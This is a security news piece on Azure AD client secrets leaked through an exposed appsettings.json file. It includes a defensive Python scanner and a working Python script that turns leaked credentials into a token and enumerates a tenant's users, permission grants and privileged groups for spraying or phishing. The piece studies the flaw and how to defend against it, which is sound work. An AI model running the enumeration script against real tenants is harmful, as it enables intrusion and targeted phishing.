A recent cybersecurity assessment by Resecurity’s HUNTER Team uncovered a high-severity leak in which Azure Active Directory (Azure AD) application credentials, specifically the ClientId and ClientSecret, were exposed in a publicly accessible appsettings.json file.
This critical misconfiguration effectively hands attackers the digital keys to the cloud environment, enabling unauthorized token requests against Microsoft’s OAuth 2.0 endpoints and giving adversaries a direct path to Microsoft Graph and Microsoft 365 data.
The leak is rated high severity because an attacker who finds the pair can present it to Microsoft’s OAuth 2.0 token endpoint and obtain tokens as the application, “effectively masquerading as the trusted application,” according to the post.
“Put simply, exposing appsettings.json with Azure AD secrets is not just a misconfiguration; it’s an attack vector that directly hands adversaries to cloud […]” according to the post.
appsettings.json is the central configuration file of an ASP.NET Core application. It holds the settings the application needs to run and is loaded automatically by the framework’s configuration system at startup, according to the post, which is exactly why credentials that belong in an environment variable or secret store so often end up inside it.
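The weak and hardened forms of the file, side by side, with a small scanner that flags the weak one. This is an added example and not code from Resecurity’s report: the two sample files and the secret value are constructed, the key names under "AzureAd" are the ones Microsoft.Identity.Web uses, and the served-root check is a heuristic for the common case where the file has been copied under a directory the web server hands out verbatim.

```python
"""Flag Azure AD client secrets that sit inside appsettings.json (added example)."""
import json
import re

# Constructed sample: the weak configuration, secret inline.
WEAK_APPSETTINGS = """{
  "AzureAd": {
    "Instance": "https://login.microsoftonline.com/",
    "TenantId": "00000000-0000-0000-0000-000000000000",
    "ClientId": "11111111-1111-1111-1111-111111111111",
    "ClientSecret": "Q~fakeSecretValueForIllustrationOnly1234567"
  },
  "Logging": {"LogLevel": {"Default": "Information"}}
}"""

# Constructed sample: the hardened form. ClientSecret is absent from the file;
# the ASP.NET Core configuration stack reads it from the environment variable
# AzureAd__ClientSecret (double underscore = section separator), from user
# secrets in development, or from a secret store. Leaking this file now yields
# a ClientId but no credential.
HARDENED_APPSETTINGS = """{
  "AzureAd": {
    "Instance": "https://login.microsoftonline.com/",
    "TenantId": "00000000-0000-0000-0000-000000000000",
    "ClientId": "11111111-1111-1111-1111-111111111111"
  },
  "Logging": {"LogLevel": {"Default": "Information"}}
}"""

# Key names that usually carry a credential, and value shapes that are references
# rather than secrets (env placeholders, angle-bracket templates, Key Vault refs).
SECRET_KEY = re.compile(r"client[_-]?secret|password|connectionstring", re.I)
PLACEHOLDER = re.compile(r"^\s*$|^<.*>$|^\$\{.*\}$|@Microsoft\.KeyVault\(", re.I)


def find_secrets(text):
    """Dotted paths of secret-looking keys whose value is a literal, not a reference."""
    hits = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, path + [key])
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, path + [str(i)])
        elif isinstance(node, str) and path and SECRET_KEY.search(path[-1]) \
                and not PLACEHOLDER.search(node):
            hits.append(".".join(path))

    walk(json.loads(text), [])
    return hits


def exposed_config_files(paths, served_roots=("wwwroot",)):
    """Heuristic: appsettings*.json files placed under a statically served directory.
    The file belongs in the content root, never under a root the server publishes."""
    exposed = []
    for p in paths:
        parts = p.replace("\\", "/").split("/")
        name = parts[-1].lower()
        if name.startswith("appsettings") and name.endswith(".json") \
                and any(root in parts[:-1] for root in served_roots):
            exposed.append(p)
    return exposed


if __name__ == "__main__":
    print("weak:", find_secrets(WEAK_APPSETTINGS))
    print("hardened:", find_secrets(HARDENED_APPSETTINGS))
    print("exposed:", exposed_config_files(["src/App/appsettings.json",
                                            "src/App/wwwroot/appsettings.Production.json"]))
```

Run it over a checkout before every release, or wire `find_secrets` into CI so a ClientSecret literal fails the build; the placeholder filter keeps `${VAR}` and `@Microsoft.KeyVault(...)` references from tripping it.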
To exploit the leak, an attacker first presents the leaked ClientId and ClientSecret to Azure AD in an OAuth 2.0 client credentials request and receives an access token issued to the application itself; no user sign-in or MFA prompt is involved, because this flow exists for daemons. What the token can read is bounded by the application permissions an administrator consented to the app, and a directory-reading permission such as Directory.Read.All is enough for everything that follows. With the token in hand, the attacker sends a GET request to the Microsoft Graph API to enumerate users in the tenant.
This yields usernames and email addresses, a ready-made list for password spraying or phishing, and reveals naming conventions and internal or service accounts, according to the post.
The attacker can also query Microsoft Graph for the tenant’s OAuth 2.0 permission grants, which show which applications have been authorized and which scopes each one holds.
The same token lets the attacker pull group information to identify privilege clusters and business-critical teams, exposing the organizational structure and pointing to key targets for compromise, according to the post.
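The full path above, token request through the three Graph queries, as an added worked example; it is not Resecurity’s tooling. The token endpoint, the Graph paths and the JSON field names are the real ones; the AZURE_* environment variable names, the privilege-keyword heuristic and the sample responses are this example’s own, constructed so the enumeration logic runs offline. The live branch only fires when the variables are set and is for tenants you are authorised to test.

```python
"""Client-credentials token plus Microsoft Graph enumeration (added example)."""
import json
import os
import re
import urllib.parse
import urllib.request
from collections import Counter

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
GRAPH = "https://graph.microsoft.com/v1.0"


def build_token_request(tenant, client_id, client_secret):
    """URL and form body for the OAuth 2.0 client credentials grant. The
    '/.default' scope yields every application permission already consented
    to the app, so the token can read exactly what the app was granted."""
    body = {"grant_type": "client_credentials", "client_id": client_id,
            "client_secret": client_secret, "scope": "https://graph.microsoft.com/.default"}
    return TOKEN_URL.format(tenant=tenant), urllib.parse.urlencode(body).encode()


def fetch_token(tenant, client_id, client_secret):
    """Live token request; authorised testing only."""
    url, body = build_token_request(tenant, client_id, client_secret)
    with urllib.request.urlopen(urllib.request.Request(url, data=body)) as resp:
        return json.load(resp)["access_token"]


def graph_get(token, path):
    """GET one page of a Graph collection with the bearer token."""
    req = urllib.request.Request(GRAPH + path, headers={"Authorization": "Bearer " + token})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def harvest_users(page):
    """(UPN, mail) pairs from GET /users: raw material for a spray or phishing list."""
    return [(u.get("userPrincipalName", ""), u.get("mail") or "") for u in page.get("value", [])]


def naming_convention(upns):
    """Most common local-part pattern, so accounts not yet seen can be predicted."""
    patterns = Counter()
    for upn in upns:
        local = upn.split("@", 1)[0].lower()
        if re.fullmatch(r"[a-z]+\.[a-z]+", local):
            patterns["first.last"] += 1
        elif re.fullmatch(r"[a-z]+", local):
            patterns["single token"] += 1
        else:
            patterns["other"] += 1
    return patterns.most_common(1)[0][0] if patterns else "unknown"


def summarize_grants(page):
    """clientId -> delegated scopes from GET /oauth2PermissionGrants;
    consentType 'AllPrincipals' marks admin consent on behalf of every user."""
    scopes = {}
    for grant in page.get("value", []):
        scopes.setdefault(grant["clientId"], set()).update(grant.get("scope", "").split())
    return {client: sorted(s) for client, s in scopes.items()}


PRIVILEGE_HINTS = re.compile(r"admin|security|finance|payroll|exec|devops|infra", re.I)  # heuristic


def privileged_groups(page):
    """Names from GET /groups that hint at privilege clusters or critical teams."""
    return sorted(g["displayName"] for g in page.get("value", [])
                  if PRIVILEGE_HINTS.search(g.get("displayName", "")))


def enumerate_tenant(users, grants, groups):
    """Fold the three queries into the attacker's target picture."""
    upns = [upn for upn, _ in harvest_users(users)]
    return {"users": upns, "naming": naming_convention(upns),
            "grants": summarize_grants(grants), "key_groups": privileged_groups(groups)}


# Constructed sample responses in Graph's shape (not captured data).
USERS_SAMPLE = {"value": [
    {"userPrincipalName": "alice.example@contoso.example", "mail": "alice.example@contoso.example"},
    {"userPrincipalName": "bob.builder@contoso.example", "mail": None},
    {"userPrincipalName": "svc-backup@contoso.example", "mail": None}]}
GRANTS_SAMPLE = {"value": [
    {"clientId": "sp-1111", "consentType": "AllPrincipals", "principalId": None, "scope": "User.Read.All Mail.Read"},
    {"clientId": "sp-1111", "consentType": "Principal", "principalId": "u-1", "scope": "Files.Read"},
    {"clientId": "sp-2222", "consentType": "Principal", "principalId": "u-2", "scope": "openid profile"}]}
GROUPS_SAMPLE = {"value": [{"displayName": "Security Admins"}, {"displayName": "Finance Approvers"},
                           {"displayName": "Book Club"}]}

if __name__ == "__main__":
    creds = [os.environ.get(k) for k in ("AZURE_TENANT_ID", "AZURE_CLIENT_ID", "AZURE_CLIENT_SECRET")]
    if all(creds):  # live run: token first, then the three Graph queries
        tok = fetch_token(*creds)
        picture = enumerate_tenant(graph_get(tok, "/users?$select=userPrincipalName,mail"),
                                   graph_get(tok, "/oauth2PermissionGrants"),
                                   graph_get(tok, "/groups?$select=displayName"))
    else:  # offline: same logic over the constructed samples
        picture = enumerate_tenant(USERS_SAMPLE, GRANTS_SAMPLE, GROUPS_SAMPLE)
    print(json.dumps(picture, indent=2))
```

On the defensive side the same three calls are what to look for in Entra sign-in logs for service principals: a client-credentials token issued to the app from an unfamiliar IP, followed by broad /users, /oauth2PermissionGrants and /groups reads, is the signature of this enumeration. Rotating the secret and moving the app to a certificate or managed identity credential closes the door.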
(Courtesy: www.darkreading.com)